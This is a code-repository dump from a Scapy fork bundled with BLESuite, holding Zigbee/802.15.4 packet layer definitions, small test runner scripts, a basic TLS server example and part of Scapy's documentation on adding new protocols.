0, 4),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 GTS Request Command ( %Dot15d4CmdGTSReq.gts_len% : %Dot15d4CmdGTSReq.gts_dir% )\")\n\n# PAN ID conflict notification command frame is not necessary, only Dot15d4Cmd with cmd_id = 5 (\"PANIDConflictNotify\")\n# Orphan notification command not necessary, only Dot15d4Cmd with cmd_id = 6 (\"OrphanNotify\")\n\n\nclass ZigBeeBeacon(Packet):\n name = \"ZigBee Beacon Payload\"\n fields_desc = [\n # Protocol ID (1 octet)\n ByteField(\"proto_id\", 0),\n # nwkcProtocolVersion (4 bits)\n BitField(\"nwkc_protocol_version\", 0, 4),\n # Stack profile (4 bits)\n BitField(\"stack_profile\", 0, 4),\n # End device capacity (1 bit)\n BitField(\"end_device_capacity\", 0, 1),\n # Device depth (4 bits)\n BitField(\"device_depth\", 0, 4),\n # Router capacity (1 bit)\n BitField(\"router_capacity\", 0, 1),\n # Reserved (2 bits)\n BitField(\"reserved\", 0, 2),\n # Extended PAN ID (8 octets)\n dot15d4AddressField(\"extended_pan_id\", 0, adjust=lambda pkt, x: 8),\n # Tx offset (3 bytes)\n # In ZigBee 2006 the Tx-Offset is optional, while in the 2007 and later versions, the Tx-Offset is a required value.\n BitField(\"tx_offset\", 0, 24),\n # Update ID (1 octet)\n ByteField(\"update_id\", 0),\n ]\n\n\n# Inter-PAN Transmission #\nclass ZigbeeNWKStub(Packet):\n name = \"Zigbee Network Layer for Inter-PAN Transmission\"\n fields_desc = [\n # NWK frame control\n BitField(\"reserved\", 0, 2), # remaining subfields shall have a value of 0\n BitField(\"proto_version\", 2, 4),\n BitField(\"frametype\", 0b11, 2), # 0b11 (3) is a reserved frame type\n BitField(\"reserved\", 0, 8), # remaining subfields shall have a value of 0\n ]\n\n def guess_payload_class(self, payload):\n if self.frametype == 0b11:\n return ZigbeeAppDataPayloadStub\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass ZigbeeAppDataPayloadStub(Packet):\n name = \"Zigbee Application Layer Data Payload for Inter-PAN Transmission\"\n fields_desc = [\n FlagsField(\"frame_control\", 0, 4, ['reserved1', 'security', 'ack_req', 'extended_hdr']),\n BitEnumField(\"delivery_mode\", 0, 2, {0: 'unicast', 2: 'broadcast', 3: 'group'}),\n BitField(\"frametype\", 3, 2), # value 0b11 (3) is a reserved frame type\n # Group Address present only when delivery mode field has a value of 0b11 (group delivery mode)\n ConditionalField(\n XLEShortField(\"group_addr\", 0x0), # 16-bit identifier of the group\n lambda pkt: pkt.getfieldval(\"delivery_mode\") == 0b11\n ),\n # Cluster identifier\n EnumField(\"cluster\", 0, _zcl_cluster_identifier, fmt=\"<H\"), # unsigned short (little-endian)\n # Profile identifier\n EnumField(\"profile\", 0, _zcl_profile_identifier, fmt=\"<H\"),\n # ZigBee Payload\n ConditionalField(\n StrLenField(\"data\", \"\", length_from=lambda pkt, s: len(s)),\n lambda pkt: pkt.frametype == 3\n ),\n ]\n\n# ZigBee Cluster Library #\n\n\ndef util_zcl_attribute_value_len(pkt):\n # Calculate the length of the attribute value field\n if (pkt.attribute_data_type == 0x00): # no data\n return 0\n elif (pkt.attribute_data_type == 0x08): # 8-bit data\n return 1\n elif (pkt.attribute_data_type == 0x09): # 16-bit data\n return 2\n elif (pkt.attribute_data_type == 0x0a): # 24-bit data\n return 3\n elif (pkt.attribute_data_type == 0x0b): # 32-bit data\n return 4\n elif (pkt.attribute_data_type == 0x0c): # 40-bit data\n return 5\n elif (pkt.attribute_data_type == 0x0d): # 48-bit data\n return 6\n elif (pkt.attribute_data_type == 0x0e): # 56-bit data\n return 7\n elif (pkt.attribute_data_type == 0x0f): # 64-bit data\n return 8\n elif (pkt.attribute_data_type == 0x10): # boolean\n return 1\n elif (pkt.attribute_data_type == 0x18): # 8-bit bitmap\n return 1\n elif (pkt.attribute_data_type == 0x19): # 16-bit bitmap\n return 2\n elif (pkt.attribute_data_type == 0x1a): # 24-bit bitmap\n return 3\n elif (pkt.attribute_data_type == 0x1b): # 32-bit bitmap\n return 4\n elif (pkt.attribute_data_type == 0x1c): # 40-bit bitmap\n return 5\n elif (pkt.attribute_data_type == 0x1d): # 48-bit bitmap\n return 6\n elif (pkt.attribute_data_type == 0x1e): # 46-bit bitmap\n return 7\n elif (pkt.attribute_data_type == 0x1f): # 64-bit bitmap\n return 8\n elif (pkt.attribute_data_type == 0x20): # Unsigned 8-bit integer\n return 1\n elif (pkt.attribute_data_type == 0x21): # Unsigned 16-bit integer\n return 2\n elif (pkt.attribute_data_type == 0x22): # Unsigned 24-bit integer\n return 3\n elif (pkt.attribute_data_type == 0x23): # Unsigned 32-bit integer\n return 4\n elif (pkt.attribute_data_type == 0x24): # Unsigned 40-bit integer\n return 5\n elif (pkt.attribute_data_type == 0x25): # Unsigned 48-bit integer\n return 6\n elif (pkt.attribute_data_type == 0x26): # Unsigned 56-bit integer\n return 7\n elif (pkt.attribute_data_type == 0x27): # Unsigned 64-bit integer\n return 8\n elif (pkt.attribute_data_type == 0x28): # Signed 8-bit integer\n return 1\n elif (pkt.attribute_data_type == 0x29): # Signed 16-bit integer\n return 2\n elif (pkt.attribute_data_type == 0x2a): # Signed 24-bit integer\n return 3\n elif (pkt.attribute_data_type == 0x2b): # Signed 32-bit integer\n return 4\n elif (pkt.attribute_data_type == 0x2c): # Signed 40-bit integer\n return 5\n elif (pkt.attribute_data_type == 0x2d): # Signed 48-bit integer\n return 6\n elif (pkt.attribute_data_type == 0x2e): # Signed 56-bit integer\n return 7\n elif (pkt.attribute_data_type == 0x2f): # Signed 64-bit integer\n return 8\n elif (pkt.attribute_data_type == 0x30): # 8-bit enumeration\n return 1\n elif (pkt.attribute_data_type == 0x31): # 16-bit enumeration\n return 2\n elif (pkt.attribute_data_type == 0x38): # Semi-precision\n return 2\n elif (pkt.attribute_data_type == 0x39): # Single precision\n return 4\n elif (pkt.attribute_data_type == 0x3a): # Double precision\n return 8\n elif (pkt.attribute_data_type == 0x41): # Octet string\n return int(pkt.attribute_value[0]) # defined in first octet\n elif (pkt.attribute_data_type == 0x42): # Character string\n return int(pkt.attribute_value[0]) # defined in first octet\n elif (pkt.attribute_data_type == 0x43): # Long octet string\n return int(pkt.attribute_value[0:2]) # defined in first two octets\n elif (pkt.attribute_data_type == 0x44): # Long character string\n return int(pkt.attribute_value[0:2]) # defined in first two octets\n # TODO implement Ordered sequence & collection\n elif (pkt.attribute_data_type == 0xe0): # Time of day\n return 4\n elif (pkt.attribute_data_type == 0xe1): # Date\n return 4\n elif (pkt.attribute_data_type == 0xe2): # UTCTime\n return 4\n elif (pkt.attribute_data_type == 0xe8): # Cluster ID\n return 2\n elif (pkt.attribute_data_type == 0xe9): # Attribute ID\n return 2\n elif (pkt.attribute_data_type == 0xea): # BACnet OID\n return 4\n elif (pkt.attribute_data_type == 0xf0): # IEEE address\n return 8\n elif (pkt.attribute_data_type == 0xf1): # 128-bit security key\n return 16\n elif (pkt.attribute_data_type == 0xff): # Unknown\n return 0\n else:\n return 0\n\n\nclass ZCLReadAttributeStatusRecord(Packet):\n name = \"ZCL Read Attribute Status Record\"\n fields_desc = [\n # Attribute Identifier\n XLEShortField(\"attribute_identifier\", 0),\n # Status\n ByteEnumField(\"status\", 0, _zcl_enumerated_status_values),\n # Attribute data type (0/1 octet), only included if status == 0x00 (SUCCESS)\n ConditionalField(\n ByteEnumField(\"attribute_data_type\", 0, _zcl_attribute_data_types),\n lambda pkt:pkt.status == 0x00\n ),\n # Attribute data (0/variable in size), only included if status == 0x00 (SUCCESS)\n ConditionalField(\n StrLenField(\"attribute_value\", \"\", length_from=lambda pkt:util_zcl_attribute_value_len(pkt)),\n lambda pkt:pkt.status == 0x00\n ),\n ]\n\n\nclass ZCLGeneralReadAttributes(Packet):\n name = \"General Domain: Command Frame Payload: read_attributes\"\n fields_desc = [\n FieldListField(\"attribute_identifiers\", [], XLEShortField(\"\", 0x0000)),\n ]\n\n\nclass ZCLGeneralReadAttributesResponse(Packet):\n name = \"General Domain: Command Frame Payload: read_attributes_response\"\n fields_desc = [\n PacketListField(\"read_attribute_status_record\", [], ZCLReadAttributeStatusRecord),\n ]\n\n\nclass ZCLMeteringGetProfile(Packet):\n name = \"Metering Cluster: Get Profile Command (Server: Received)\"\n fields_desc = [\n # Interval Channel (8-bit Enumeration): 1 octet\n ByteField(\"Interval_Channel\", 0), # 0 == Consumption Delivered ; 1 == Consumption Received\n # End Time (UTCTime): 4 octets\n XLEIntField(\"End_Time\", 0x00000000),\n # NumberOfPeriods (Unsigned 8-bit Integer): 1 octet\n ByteField(\"NumberOfPeriods\", 1), # Represents the number of intervals being requested.\n ]\n\n\nclass ZCLPriceGetCurrentPrice(Packet):\n name = \"Price Cluster: Get Current Price Command (Server: Received)\"\n fields_desc = [\n BitField(\"reserved\", 0, 7),\n BitField(\"Requestor_Rx_On_When_Idle\", 0, 1),\n ]\n\n\nclass ZCLPriceGetScheduledPrices(Packet):\n name = \"Price Cluster: Get Scheduled Prices Command (Server: Received)\"\n fields_desc = [\n XLEIntField(\"start_time\", 0x00000000), # UTCTime (4 octets)\n ByteField(\"number_of_events\", 0), # Number of Events (1 octet)\n ]\n\n\nclass ZCLPricePublishPrice(Packet):\n name = \"Price Cluster: Publish Price Command (Server: Generated)\"\n fields_desc = [\n XLEIntField(\"provider_id\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n # Rate Label is a UTF-8 encoded Octet String (0-12 octets). The first Octet indicates the length.\n StrLenField(\"rate_label\", \"\", length_from=lambda pkt:int(pkt.rate_label[0])), # TODO verify\n XLEIntField(\"issuer_event_id\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n XLEIntField(\"current_time\", 0x00000000), # UTCTime (4 octets)\n ByteField(\"unit_of_measure\", 0), # 8 bits enumeration (1 octet)\n XLEShortField(\"currency\", 0x0000), # Unsigned 16-bit Integer (2 octets)\n ByteField(\"price_trailing_digit\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"number_of_price_tiers\", 0), # 8-bit BitMap (1 octet)\n XLEIntField(\"start_time\", 0x00000000), # UTCTime (4 octets)\n XLEShortField(\"duration_in_minutes\", 0x0000), # Unsigned 16-bit Integer (2 octets)\n XLEIntField(\"price\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"price_ratio\", 0), # Unsigned 8-bit Integer (1 octet)\n XLEIntField(\"generation_price\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"generation_price_ratio\", 0), # Unsigned 8-bit Integer (1 octet)\n XLEIntField(\"alternate_cost_delivered\", 0x00000000), # Unsigned 32-bit Integer (4 octets)\n ByteField(\"alternate_cost_unit\", 0), # 8-bit enumeration (1 octet)\n ByteField(\"alternate_cost_trailing_digit\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"number_of_block_thresholds\", 0), # 8-bit BitMap (1 octet)\n ByteField(\"price_control\", 0), # 8-bit BitMap (1 octet)\n ]\n\n\nclass ZigbeeClusterLibrary(Packet):\n name = \"Zigbee Cluster Library (ZCL) Frame\"\n fields_desc = [\n # Frame control (8 bits)\n BitField(\"reserved\", 0, 3),\n BitField(\"disable_default_response\", 0, 1), # 0 default response command will be returned\n BitField(\"direction\", 0, 1), # 0 command sent from client to server; 1 command sent from server to client\n BitField(\"manufacturer_specific\", 0, 1), # 0 manufacturer code shall not be included in the ZCL frame\n # Frame Type\n # 0b00 command acts across the entire profile\n # 0b01 command is specific to a cluster\n # 0b10 - 0b11 reserved\n BitEnumField(\"zcl_frametype\", 0, 2, {0: 'profile-wide', 1: 'cluster-specific', 2: 'reserved2', 3: 'reserved3'}),\n # Manufacturer code (0/16 bits) only present then manufacturer_specific field is set to 1\n ConditionalField(XLEShortField(\"manufacturer_code\", 0x0),\n lambda pkt: pkt.getfieldval(\"manufacturer_specific\") == 1\n ),\n # Transaction sequence number (8 bits)\n ByteField(\"transaction_sequence\", 0),\n # Command identifier (8 bits): the cluster command\n ByteField(\"command_identifier\", 0),\n ]\n\n def guess_payload_class(self, payload):\n # Profile-wide commands\n if self.zcl_frametype == 0x00 and self.command_identifier == 0x00:\n return ZCLGeneralReadAttributes\n elif self.zcl_frametype == 0x00 and self.command_identifier == 0x01:\n return ZCLGeneralReadAttributesResponse\n # Cluster-specific commands\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 0 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPriceGetCurrentPrice\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x01 and self.direction == 0 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPriceGetScheduledPrices\n elif self.zcl_frametype == 0x01 and self.command_identifier == 0x00 and self.direction == 1 and self.underlayer.cluster == 0x0700: # \"price\"\n return ZCLPricePublishPrice\n else:\n return Packet.guess_payload_class(self, payload)\n\n# Zigbee Encapsulation Protocol\n\n\nclass ZEP2(Packet):\n name = \"Zigbee Encapsulation Protocol (V2)\"\n fields_desc = [\n StrFixedLenField(\"preamble\", \"EX\", length=2),\n ByteField(\"ver\", 0),\n ByteField(\"type\", 0),\n ByteField(\"channel\", 0),\n ShortField(\"device\", 0),\n ByteField(\"lqi_mode\", 1),\n ByteField(\"lqi_val\", 0),\n TimeStampField(\"timestamp\", 0),\n IntField(\"seq\", 0),\n BitField(\"res\", 0, 80), # 10 bytes reserved field\n ByteField(\"length\", 0),\n ]\n\n @classmethod\n def dispatch_hook(cls, _pkt=b\"\", *args, **kargs):\n if _pkt and len(_pkt) >= 4:\n v = orb(_pkt[2])\n if v == 1:\n return ZEP1\n elif v == 2:\n return ZEP2\n return cls\n\n def guess_payload_class(self, payload):\n if self.lqi_mode:\n return Dot15d4\n else:\n return Dot15d4FCS\n\n\nclass ZEP1(ZEP2):\n name = \"Zigbee Encapsulation Protocol (V1)\"\n fields_desc = [\n StrFixedLenField(\"preamble\", \"EX\", length=2),\n ByteField(\"ver\", 0),\n ByteField(\"channel\", 0),\n ShortField(\"device\", 0),\n ByteField(\"lqi_mode\", 0),\n ByteField(\"lqi_val\", 0),\n BitField(\"res\", 0, 56), # 7 bytes reserved field\n ByteField(\"len\", 0),\n ]\n\n\n# Bindings #\nbind_layers(Dot15d4, Dot15d4Beacon, fcf_frametype=0)\nbind_layers(Dot15d4, Dot15d4Data, fcf_frametype=1)\nbind_layers(Dot15d4, Dot15d4Ack, fcf_frametype=2)\nbind_layers(Dot15d4, Dot15d4Cmd, fcf_frametype=3)\nbind_layers(Dot15d4FCS, Dot15d4Beacon, fcf_frametype=0)\nbind_layers(Dot15d4FCS, Dot15d4Data, fcf_frametype=1)\nbind_layers(Dot15d4FCS, Dot15d4Ack, fcf_frametype=2)\nbind_layers(Dot15d4FCS, Dot15d4Cmd, fcf_frametype=3)\n# TODO: find a way to chose between ZigbeeNWK and SixLoWPAN (cf. sixlowpan.py)\n# bind_layers( Dot15d4Data, ZigbeeNWK)\nbind_layers(ZigbeeAppDataPayload, ZigbeeAppCommandPayload, frametype=1)\nbind_layers(Dot15d4Beacon, ZigBeeBeacon)\n\nbind_bottom_up(UDP, ZEP2, sport=17754)\nbind_bottom_up(UDP, ZEP2, sport=17754)\nbind_layers(UDP, ZEP2, sport=17754, dport=17754)\n\n# DLT Types #\nconf.l2types.register(195, Dot15d4FCS)\nconf.l2types.register(230, Dot15d4)\n" }, { "alpha_fraction": 0.449438214302063, "alphanum_fraction": 0.45505619049072266, "avg_line_length": 58.33333206176758, "blob_id": "2e93bf424b08091e3b0d7d9f9f081558661e1eeb", "content_id": "eebaba60135a9681186d726fd80b7ddd2b0a371a", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 178, "license_type": "permissive", "max_line_length": 142, "num_lines": 3, "path": "/scapy/test/import_tester", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/bash\ncd \"$(dirname $0)/..\"\nfind scapy -name '*.py' | sed -e 's#/#.#g' -e 's/\\(\\.__init__\\)\\?\\.py$//' | while read a; do echo \"######### $a\"; python -c \"import $a\"; done\n" }, { "alpha_fraction": 0.6549707651138306, "alphanum_fraction": 0.6608186960220337, "avg_line_length": 33.20000076293945, "blob_id": "3fd95dbfa4eba4b41661c284b4b30ea781abad4c", "content_id": "e875227faf9bb4faa8654fa1bb88bb3f181d38b1", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 342, "license_type": "permissive", "max_line_length": 157, "num_lines": 10, "path": "/scapy/test/run_tests", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nDIR=$(dirname $0)/..\nPYTHON=${PYTHON:-python}\nPYTHONDONTWRITEBYTECODE=\"True\"\nif [ -z \"$*\" ]\nthen\n PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py -t regression.uts -f html -K ipv6 -l -o /tmp/scapy_regression_test_$(date +%Y%m%d-%H%M%S).html\nelse\n PYTHONPATH=$DIR exec $PYTHON ${DIR}/scapy/tools/UTscapy.py \"$@\"\nfi\n" }, { "alpha_fraction": 0.676300585269928, "alphanum_fraction": 0.6890173554420471, "avg_line_length": 26.870967864990234, "blob_id": "800b7e8b24648467597dc4682f924b0a4b4a37b2", "content_id": "ed740aa74e95cd026e4acab00fe0d1ba82acf596", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "permissive", "max_line_length": 76, "num_lines": 31, "path": "/scapy/test/tls/example_server.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nBasic TLS server. A preferred ciphersuite may be provided as first argument.\n\nFor instance, \"sudo ./server_simple.py c014\" will start a server accepting\nany TLS client connection. If provided, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\nwill be preferred to any other suite the client might propose.\n\"\"\"\n\nimport os\nimport sys\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_srv import TLSServerAutomaton\n\n\nif len(sys.argv) == 2:\n pcs = int(sys.argv[1], 16)\nelse:\n pcs = None\n\nt = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem',\n mykey=basedir+'/test/tls/pki/srv_key.pem',\n preferred_ciphersuite=pcs)\nt.run()\n\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "be3a842eea050bbd15f88fc38a5ad8e7f9a6d8fa", "content_id": "3fe3b8a6e97d5090e004043ab539955dec9f01d9", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/test/run_tests_py3", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python3\n. $(dirname $0)/run_tests \"$@\"\n" }, { "alpha_fraction": 0.6263659596443176, "alphanum_fraction": 0.6452690362930298, "avg_line_length": 33.26619338989258, "blob_id": "fd1c143d30e25107423300efa3143994a5db6ed7", "content_id": "60bd2f6cd24eaa035f83ceff302a229ad19f215a", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 38626, "license_type": "permissive", "max_line_length": 821, "num_lines": 1127, "path": "/scapy/doc/scapy/build_dissect.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "********************\nAdding new protocols\n********************\n\nAdding new protocol (or more correctly: a new *layer*) in Scapy is very easy. All the magic is in the fields. If the \nfields you need are already there and the protocol is not too brain-damaged, \nthis should be a matter of minutes. \n\nSimple example\n==============\n\nA layer is a subclass of the ``Packet`` class. All the logic behind layer manipulation \nis held by the ``Packet`` class and will be inherited. \nA simple layer is compounded by a list of fields that will be either concatenated \nwhen assembling the layer or dissected one by one when disassembling a string. \nThe list of fields is held in an attribute named ``fields_desc``. Each field is an instance \nof a field class:: \n\n class Disney(Packet): \n name = \"DisneyPacket \" \n fields_desc=[ ShortField(\"mickey\",5), \n XByteField(\"minnie\",3) , \n IntEnumField(\"donald\" , 1 , \n { 1: \"happy\", 2: \"cool\" , 3: \"angry\" } ) ]\n \nIn this example, our layer has three fields. The first one is a 2-byte integer \nfield named ``mickey`` and whose default value is 5. The second one is a 1-byte \ninteger field named ``minnie`` and whose default value is 3. The difference between \na vanilla ``ByteField`` and an ``XByteField`` is only the fact that the preferred human \nrepresentation of the field’s value is in hexadecimal. The last field is a 4-byte \ninteger field named ``donald``. It is different from a vanilla ``IntField`` by the fact \nthat some of the possible values of the field have literate representations. For \nexample, if it is worth 3, the value will be displayed as angry. Moreover, if the \n\"cool\" value is assigned to this field, it will understand that it has to take the \nvalue 2. \n\nIf your protocol is as simple as this, it is ready to use:: \n\n >>> d=Disney(mickey=1) \n >>> ls(d) \n mickey : ShortField = 1 (5) \n minnie : XByteField = 3 (3) \n donald : IntEnumField = 1 (1) \n >>> d.show() \n ###[ Disney Packet ]### \n mickey= 1 \n minnie= 0x3 \n donald= happy \n >>> d.donald=\"cool\" \n >>> raw(d)\n ’\\x00\\x01\\x03\\x00\\x00\\x00\\x02’ \n >>> Disney( ) \n <Disney mickey=1 minnie=0x3 donald=cool |> \n\n\nThis chapter explains how to build a new protocol within Scapy. There are two main objectives:\n\n* Dissecting: this is done when a packet is received (from the network or a file) and should be converted to Scapy’s internals.\n* Building: When one wants to send such a new packet, some stuff needs to be adjusted automatically in it.\n\nLayers\n======\n\nBefore digging into dissection itself, let us look at how packets are\norganized.\n\n::\n\n >>> p = IP()/TCP()/\"AAAA\"\n >>> p\n <IP frag=0 proto=TCP |<TCP |<Raw load='AAAA' |>>>\n >>> p.summary()\n 'IP / TCP 127.0.0.1:ftp-data > 127.0.0.1:www S / Raw'\n\nWe are interested in 2 \"inside\" fields of the class ``Packet``:\n\n* ``p.underlayer``\n* ``p.payload``\n\nAnd here is the main \"trick\". You do not care about packets, only\nabout layers, stacked one after the other. \n\nOne can easily access a layer by its name: ``p[TCP]`` returns the ``TCP``\nand followings layers. This is a shortcut for ``p.getlayer(TCP)``.\n\n.. note::\n There is an optional argument (``nb``) which returns the ``nb`` th layer of required protocol.\n\nLet's put everything together now, playing with the ``TCP`` layer::\n\n >>> tcp=p[TCP]\n >>> tcp.underlayer\n <IP frag=0 proto=TCP |<TCP |<Raw load='AAAA' |>>>\n >>> tcp.payload\n <Raw load='AAAA' |>\n\nAs expected, ``tcp.underlayer`` points to the beginning of our IP packet,\nand ``tcp.payload`` to its payload.\n\nBuilding a new layer\n--------------------\n\n.. index::\n single: Layer\n\nVERY EASY! A layer is mainly a list of fields. Let's look at ``UDP`` definition::\n\n class UDP(Packet):\n name = \"UDP\"\n fields_desc = [ ShortEnumField(\"sport\", 53, UDP_SERVICES),\n ShortEnumField(\"dport\", 53, UDP_SERVICES),\n ShortField(\"len\", None),\n XShortField(\"chksum\", None), ]\n\nAnd you are done! There are many fields already defined for\nconvenience, look at the doc``^W`` sources as Phil would say.\n\nSo, defining a layer is simply gathering fields in a list. The goal is\nhere to provide the efficient default values for each field so the\nuser does not have to give them when he builds a packet. \n\nThe main mechanism is based on the ``Field`` structure. Always keep in\nmind that a layer is just a little more than a list of fields, but not\nmuch more. \n\nSo, to understand how layers are working, one needs to look quickly\nat how the fields are handled.\n\n\nManipulating packets == manipulating its fields\n-----------------------------------------------\n\n.. index::\n single: i2h()\n single: i2m()\n single: m2i()\n\nA field should be considered in different states:\n\n- ``i`` (nternal) : this is the way Scapy manipulates it.\n- ``m`` (achine) : this is where the truth is, that is the layer as it is\n on the network.\n- ``h`` (uman) : how the packet is displayed to our human eyes.\n\nThis explains the mysterious methods ``i2h()``, ``i2m()``, ``m2i()`` and so on\navailable in each field: they are the conversion from one state to\nanother, adapted to a specific use.\n\nOther special functions:\n\n- ``any2i()`` guess the input representation and returns the internal one.\n- ``i2repr()`` a nicer ``i2h()``\n\nHowever, all these are \"low level\" functions. The functions adding or\nextracting a field to the current layer are:\n\n- ``addfield(self, pkt, s, val)``: copy the network representation of\n field ``val`` (belonging to layer ``pkt``) to the raw string packet ``s``::\n\n class StrFixedLenField(StrField):\n def addfield(self, pkt, s, val):\n return s+struct.pack(\"%is\"%self.length,self.i2m(pkt, val))\n\n- ``getfield(self, pkt, s)``: extract from the raw packet ``s`` the field\n value belonging to layer ``pkt``. It returns a list, the 1st element\n is the raw packet string after having removed the extracted field,\n the second one is the extracted field itself in internal\n representation::\n\n class StrFixedLenField(StrField):\n def getfield(self, pkt, s):\n return s[self.length:], self.m2i(pkt,s[:self.length])\n \nWhen defining your own layer, you usually just need to define some\n``*2*()`` methods, and sometimes also the ``addfield()`` and ``getfield()``.\n\n\nExample: variable length quantities\n-----------------------------------\n\nThere is a way to represent integers on a variable length quantity often\nused in protocols, for instance when dealing with signal processing\n(e.g. MIDI). \n\nEach byte of the number is coded with the MSB set to 1, except the\nlast byte. For instance, 0x123456 will be coded as 0xC8E856:: \n\n def vlenq2str(l):\n s = []\n s.append( hex(l & 0x7F) )\n l = l >> 7\n while l>0:\n s.append( hex(0x80 | (l & 0x7F) ) )\n l = l >> 7\n s.reverse()\n return \"\".join(chr(int(x, 16)) for x in s)\n \n def str2vlenq(s=\"\"):\n i = l = 0\n while i<len(s) and ord(s[i]) & 0x80:\n l = l << 7\n l = l + (ord(s[i]) & 0x7F)\n i = i + 1\n if i == len(s):\n warning(\"Broken vlenq: no ending byte\")\n l = l << 7\n l = l + (ord(s[i]) & 0x7F)\n \n return s[i+1:], l\n\nWe will define a field which computes automatically the length of an\nassociated string, but used that encoding format::\n\n class VarLenQField(Field):\n \"\"\" variable length quantities \"\"\"\n __slots__ = [\"fld\"]\n \n def __init__(self, name, default, fld):\n Field.__init__(self, name, default)\n self.fld = fld\n \n def i2m(self, pkt, x):\n if x is None:\n f = pkt.get_field(self.fld)\n x = f.i2len(pkt, pkt.getfieldval(self.fld))\n x = vlenq2str(x)\n return raw(x)\n \n def m2i(self, pkt, x):\n if s is None:\n return None, 0\n return str2vlenq(x)[1]\n \n def addfield(self, pkt, s, val):\n return s+self.i2m(pkt, val)\n \n def getfield(self, pkt, s):\n return str2vlenq(s)\n\nAnd now, define a layer using this kind of field::\n\n class FOO(Packet):\n name = \"FOO\"\n fields_desc = [ VarLenQField(\"len\", None, \"data\"),\n StrLenField(\"data\", \"\", \"len\") ]\n \n >>> f = FOO(data=\"A\"*129)\n >>> f.show()\n ###[ FOO ]###\n len= 0\n data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nHere, ``len`` is not yet computed and only the default value are\ndisplayed. This is the current internal representation of our\nlayer. Let's force the computation now::\n\n >>> f.show2()\n ###[ FOO ]###\n len= 129\n data= 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nThe method ``show2()`` displays the fields with their values as they will\nbe sent to the network, but in a human readable way, so we see ``len=129``.\nLast but not least, let us look now at the machine representation::\n\n >>> raw(f)\n '\\x81\\x01AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\nThe first 2 bytes are ``\\x81\\x01``, which is 129 in this encoding.\n\n\n \nDissecting \n==========\n.. index::\n dissecting\n \nLayers only are list of fields, but what is the glue between each\nfield, and after, between each layer. These are the mysteries explain\nin this section.\n\nThe basic stuff\n---------------\n\nThe core function for dissection is ``Packet.dissect()``::\n\n def dissect(self, s):\n s = self.pre_dissect(s)\n s = self.do_dissect(s)\n s = self.post_dissect(s) \n payl,pad = self.extract_padding(s)\n self.do_dissect_payload(payl)\n if pad and conf.padding:\n self.add_payload(Padding(pad))\n\nWhen called, ``s`` is a string containing what is going to be\ndissected. ``self`` points to the current layer.\n \n::\n\n >>> p=IP(\"A\"*20)/TCP(\"B\"*32)\n WARNING: bad dataofs (4). Assuming dataofs=5\n >>> p\n <IP version=4L ihl=1L tos=0x41 len=16705 id=16705 flags=DF frag=321L ttl=65 proto=65 chksum=0x4141\n src=65.65.65.65 dst=65.65.65.65 |<TCP sport=16962 dport=16962 seq=1111638594L ack=1111638594L dataofs=4L\n reserved=2L flags=SE window=16962 chksum=0x4242 urgptr=16962 options=[] |<Raw load='BBBBBBBBBBBB' |>>>\n\n``Packet.dissect()`` is called 3 times:\n\n1. to dissect the ``\"A\"*20`` as an IPv4 header\n2. to dissect the ``\"B\"*32`` as a TCP header\n3. and since there are still 12 bytes in the packet, they are\n dissected as \"``Raw``\" data (which is some kind of default layer type)\n\n\nFor a given layer, everything is quite straightforward:\n\n- 